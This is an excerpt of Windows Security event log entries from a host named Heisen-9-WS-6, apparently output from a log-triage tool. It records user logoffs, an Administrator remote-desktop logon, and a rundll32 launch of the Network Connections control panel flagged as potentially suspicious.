&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 16:52:03 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2709      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x123cb3'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 16:52:03 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2710      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x123c95'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 16:55:19 &#9474; &#8227; Admin User Remote Logon           &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 2866      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: Neg   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; otiate                           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: User32         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; $                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.10.16.6            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2020b7'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '%%1843'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 10                    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '0'                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x56c'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: C:\Windows\System   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 32\svchost.exe                   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:01:49 &#9474; &#8227; Potentially Suspicious            &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4688     &#9474; 3036      &#9474; Heisen-9-WS-6   &#9474; TokenElevationType: '%%1936'     &#9474;
&#9474;                     &#9474; Rundll32 Activity                   &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: '-'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewProcessId: '0x49c'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x2020b7'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ParentProcessName: C:\Windows\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; System32\control.exe             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x0'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewProcessName: C:\Windows\Sys   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; tem32\rundll32.exe               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: HEISEN-9-WS   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -6                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x2338'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; CommandLine: '"C:\Windows\syst   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; em32\rundll32.exe" Shell32.dll   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ,Control_RunDLL "C:\Windows\sy   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; stem32\ncpa.cpl",'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: '-'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; MandatoryLabel: S-1-16-12288     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-0-0           &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:12 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 3093      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2020b7'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:12 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 3094      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x33618'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:14 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3101      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: UMFD-2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1eaf4a'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:15 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3102      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: UMFD-1           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x9bb6'          &#9474;
